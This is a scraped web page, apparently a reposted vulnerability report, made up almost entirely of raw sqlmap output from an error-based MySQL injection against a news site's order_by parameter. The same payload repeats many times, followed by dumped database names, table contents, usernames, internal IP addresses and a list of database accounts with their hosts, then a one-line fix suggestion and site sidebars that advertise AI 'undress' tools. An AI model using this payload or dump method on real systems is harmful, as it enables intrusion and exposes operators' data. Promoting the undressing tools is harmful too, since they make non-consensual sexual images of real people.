x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>current user is DBA: 'True'<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: apphistory_news<br>[5 tables]<br>+-------------+<br>| figure |<br>| hot_tag |<br>| relate_news |<br>| relate_pic|<br>| stats |<br>+-------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_weather<br>[5 tables]<br>+-------------+<br>| abroad |<br>| airport |<br>| internal |<br>| nephogram |<br>| relate_news |<br>+-------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_news<br>[23 tables]<br>+-----------------------------+<br>| hash |<br>| hdphoto |<br>| ip_test |<br>| lianghui_2010 |<br>| lianghui_2010_copy_20100226 |<br>| lianghui_2010_lhyl |<br>| lianghui_2012 |<br>| lianghui_2012_lhyl |<br>| special_diqiuyixiaoshi2010|<br>| special_martyr |<br>| special_qinghaiyushudizhen|<br>| special_xinanhanzai |<br>| timeline |<br>| tw_vote |<br>| upload |<br>| upload_20121116 |<br>| upload_v |<br>| user_test |<br>| vote_category |<br>| vote_detail |<br>| weather_yb |<br>| weather_yb_tomorrow |<br>| weather_zh |<br>+-----------------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_news<br>Table: user_test<br>[2 entries]<br>+----+--------------+------+---------+-------------+---------------------+<br>| id | ip | lock | intro | username | rec_time |<br>+----+--------------+------+---------+-------------+---------------------+<br>| 1| 220.181.24.2 | | <blank> | wangyun1127 | 2010-05-10 14:27:06 |<br>| 2| 220.181.24.2 | | c100 | c100 | 0000-00-00 00:00:00 |<br>+----+--------------+------+---------+-------------+---------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_news<br>Table: hash<br>[10 entries]<br>+----+--------------+--------+<br>| id | name | value|<br>+----+--------------+--------+<br>| 1| ygdx_gd | 258 |<br>| 2| ygdx_bsd | 306 |<br>| 3| ygdx_zmd | 57 |<br>| 4| ygdx_time | 5月8日 |<br>| 5| wudu2010_hlb | 198864 |<br>| 6| wudu2010_szc | 150782 |<br>| 7| wudu2010_wyc | 0 |<br>| 8| wudu2010_xsh | 0 |<br>| 9| wudu2010_wwm | 0 |<br>| 10 | wudu2010_zll | 358715 |<br>+----+--------------+--------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_news<br>Table: lianghui_2012<br>[10 entries]<br>+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+<br>| id | type | title | verify | delete | cai_num | content | ding_num | user_name | user_type | click_num | debate_num | submit_time |<br>+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+<br>| 1| 1 | 1 | 1 | | 2 | 1 | 3 | kuaibo_10501 | 1 | 7 | 0 | 2012-02-28 17:44:30 |<br>| 2| 1 | 11 | 1 | | 0 | 1 | 1 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:46:47 |<br>| 3| 1 | 2 | 1 | | 0 | 2 | 1 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:46:54 |<br>| 4| 1 | 3 | 1 | | 0 | 3 | 0 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:46:59 |<br>| 5| 1 | 4 | 1 | | 0 | 4 | 0 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:47:05 |<br>| 6| 1 | 5 | 1 | | 1 | 5 | 0 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:47:09 |<br>| 7| 1 | 5 | 1 | | 1 | 5 | 20 | kuaibo_10501 | 1 | 97 | 0 | 2012-02-29 15:47:17 |<br>| 8| 1 | 6 | 1 | | 0 | 6 | 5 | kuaibo_10501 | 1 | 107 | 0 | 2012-02-29 15:47:22 |<br>| 9| 1 | 7 | 1 | | 0 | 7 | 91 | kuaibo_10501 | 1 | 235 | 0 | 2012-02-29 15:47:26 |<br>| 10 | 1 | 8 | 1 | | 2 | 8 | 2 | kuaibo_10501 | 1 | 97 | 0 | 2012-02-29 15:47:31 |<br>+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>current user is DBA: 'True'<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>database management system users [234]:<br>[*] ''@'localhost'<br>[*] 'B74wNuTbbx'@'10.11.2.89'<br>[*] 'B74wNuTbbx'@'10.11.2.90'<br>[*] 'B74wNuTbbx'@'10.13.2.134'<br>[*] 'B74wNuTbbx'@'10.13.2.135'<br>[*] 'B74wNuTbbx'@'10.13.2.176'<br>[*] 'B74wNuTbbx'@'10.13.2.177'<br>[*] 'B74wNuTbbx'@'220.181.67.192'<br>[*] 'iadmin'@'211.151.61.77'<br>[*] 'root'@'10.13.2.132'<br>[*] 'root'@'10.13.2.134'<br>[*] 'root'@'10.13.2.135'<br>[*] 'root'@'10.13.2.176'<br>[*] 'root'@'10.13.2.177'<br>[*] 'root'@'127.0.0.1'<br>[*] 'root'@'192.168.2.162'<br>[*] 'root'@'192.168.2.167'<br>[*] 'root'@'220.181.24.100'<br>[*] 'root'@'220.181.24.166'<br>[*] 'root'@'220.181.24.2'<br>[*] 'root'@'220.181.67.192'<br>[*] 'root'@'localhost'<br>[*] 'zabbix'@'127.0.0.1'</blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></blank></code>
로그인 후 복사
修复方案:
还是防注入吧
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
핫 AI 도구
Undresser.AI Undress
사실적인 누드 사진을 만들기 위한 AI 기반 앱
AI Clothes Remover
사진에서 옷을 제거하는 온라인 AI 도구입니다.
Undress AI Tool
무료로 이미지를 벗다
Clothoff.io
AI 옷 제거제
Video Face Swap
완전히 무료인 AI 얼굴 교환 도구를 사용하여 모든 비디오의 얼굴을 쉽게 바꾸세요!
인기 기사
어 ass 신 크리드 그림자 : 조개 수수께끼 솔루션
3 몇 주 전
By DDD
Windows 11 KB5054979의 새로운 기능 및 업데이트 문제를 해결하는 방법
2 몇 주 전
By DDD
Atomfall에서 크레인 제어 키 카드를 찾을 수 있습니다
3 몇 주 전
By DDD
<s> : 데드 레일 - 모든 도전을 완료하는 방법
4 몇 주 전
By DDD
Atomfall Guide : 항목 위치, 퀘스트 가이드 및 팁
4 몇 주 전
By DDD
뜨거운 도구
메모장++7.3.1
사용하기 쉬운 무료 코드 편집기
SublimeText3 중국어 버전
중국어 버전, 사용하기 매우 쉽습니다.
스튜디오 13.0.1 보내기
강력한 PHP 통합 개발 환경
드림위버 CS6
시각적 웹 개발 도구
SublimeText3 Mac 버전
신 수준의 코드 편집 소프트웨어(SublimeText3)
뜨거운 주제
Gmail 이메일의 로그인 입구는 어디에 있나요?
7651
15
7651
15
Cakephp 튜토리얼
1392
52
1392
52
Steam의 계정 이름 형식은 무엇입니까?
91
11
91
11
Win11 활성화 키 영구
73
19
73
19
NYT 미니 크로스 워드 답변
36
110
36
110
MySQL에서 인덱스를 사용하는 것보다 전체 테이블 스캔이 더 빠를 수 있습니까?
Apr 09, 2025 am 12:05 AM
전체 테이블 스캔은 MySQL에서 인덱스를 사용하는 것보다 빠를 수 있습니다. 특정 사례는 다음과 같습니다. 1) 데이터 볼륨은 작습니다. 2) 쿼리가 많은 양의 데이터를 반환 할 때; 3) 인덱스 열이 매우 선택적이지 않은 경우; 4) 복잡한 쿼리시. 쿼리 계획을 분석하고 인덱스 최적화, 과도한 인덱스를 피하고 정기적으로 테이블을 유지 관리하면 실제 응용 프로그램에서 최상의 선택을 할 수 있습니다.
InnoDB 전체 텍스트 검색 기능을 설명하십시오.
Apr 02, 2025 pm 06:09 PM
InnoDB의 전체 텍스트 검색 기능은 매우 강력하여 데이터베이스 쿼리 효율성과 대량의 텍스트 데이터를 처리 할 수있는 능력을 크게 향상시킬 수 있습니다. 1) InnoDB는 기본 및 고급 검색 쿼리를 지원하는 역 색인화를 통해 전체 텍스트 검색을 구현합니다. 2) 매치 및 키워드를 사용하여 검색, 부울 모드 및 문구 검색을 지원합니다. 3) 최적화 방법에는 워드 세분화 기술 사용, 인덱스의 주기적 재건 및 캐시 크기 조정, 성능과 정확도를 향상시키는 것이 포함됩니다.
Windows 7에 MySQL을 설치할 수 있습니까?
Apr 08, 2025 pm 03:21 PM
예, MySQL은 Windows 7에 설치 될 수 있으며 Microsoft는 Windows 7 지원을 중단했지만 MySQL은 여전히 호환됩니다. 그러나 설치 프로세스 중에 다음 지점이 표시되어야합니다. Windows 용 MySQL 설치 프로그램을 다운로드하십시오. MySQL의 적절한 버전 (커뮤니티 또는 기업)을 선택하십시오. 설치 프로세스 중에 적절한 설치 디렉토리 및 문자를 선택하십시오. 루트 사용자 비밀번호를 설정하고 올바르게 유지하십시오. 테스트를 위해 데이터베이스에 연결하십시오. Windows 7의 호환성 및 보안 문제에 주목하고 지원되는 운영 체제로 업그레이드하는 것이 좋습니다.
MySQL : 쉽게 학습하기위한 간단한 개념
Apr 10, 2025 am 09:29 AM
MySQL은 오픈 소스 관계형 데이터베이스 관리 시스템입니다. 1) 데이터베이스 및 테이블 작성 : CreateAbase 및 CreateTable 명령을 사용하십시오. 2) 기본 작업 : 삽입, 업데이트, 삭제 및 선택. 3) 고급 운영 : 가입, 하위 쿼리 및 거래 처리. 4) 디버깅 기술 : 확인, 데이터 유형 및 권한을 확인하십시오. 5) 최적화 제안 : 인덱스 사용, 선택을 피하고 거래를 사용하십시오.
InnoDB에서 클러스터 된 인덱스와 비 클러스터 된 인덱스 (2 차 지수)의 차이.
Apr 02, 2025 pm 06:25 PM
클러스터 인덱스와 비 클러스터 인덱스의 차이점은 1. 클러스터 된 인덱스는 인덱스 구조에 데이터 행을 저장하며, 이는 기본 키 및 범위별로 쿼리에 적합합니다. 2. 클러스터되지 않은 인덱스는 인덱스 키 값과 포인터를 데이터 행으로 저장하며 비 예산 키 열 쿼리에 적합합니다.
MySQL 사용자와 데이터베이스의 관계
Apr 08, 2025 pm 07:15 PM
MySQL 데이터베이스에서 사용자와 데이터베이스 간의 관계는 권한과 테이블로 정의됩니다. 사용자는 데이터베이스에 액세스 할 수있는 사용자 이름과 비밀번호가 있습니다. 권한은 보조금 명령을 통해 부여되며 테이블은 Create Table 명령에 의해 생성됩니다. 사용자와 데이터베이스 간의 관계를 설정하려면 데이터베이스를 작성하고 사용자를 생성 한 다음 권한을 부여해야합니다.
다양한 유형의 MySQL 인덱스 (B-Tree, Hash, Full-Text, Spatial)를 설명하십시오.
Apr 02, 2025 pm 07:05 PM
MySQL은 B-Tree, Hash, Full-Text 및 Spatial의 4 가지 인덱스 유형을 지원합니다. 1.B- 트리 색인은 동일한 값 검색, 범위 쿼리 및 정렬에 적합합니다. 2. 해시 인덱스는 동일한 값 검색에 적합하지만 범위 쿼리 및 정렬을 지원하지 않습니다. 3. 전체 텍스트 색인은 전체 텍스트 검색에 사용되며 다량의 텍스트 데이터를 처리하는 데 적합합니다. 4. 공간 지수는 지리 공간 데이터 쿼리에 사용되며 GIS 응용 프로그램에 적합합니다.
MySQL과 Mariadb가 공존 할 수 있습니다
Apr 08, 2025 pm 02:27 PM
MySQL 및 MariaDB는 공존 할 수 있지만주의해서 구성해야합니다. 열쇠는 각 데이터베이스에 다른 포트 번호와 데이터 디렉토리를 할당하고 메모리 할당 및 캐시 크기와 같은 매개 변수를 조정하는 것입니다. 연결 풀링, 애플리케이션 구성 및 버전 차이도 고려해야하며 함정을 피하기 위해 신중하게 테스트하고 계획해야합니다. 두 개의 데이터베이스를 동시에 실행하면 리소스가 제한되는 상황에서 성능 문제가 발생할 수 있습니다.
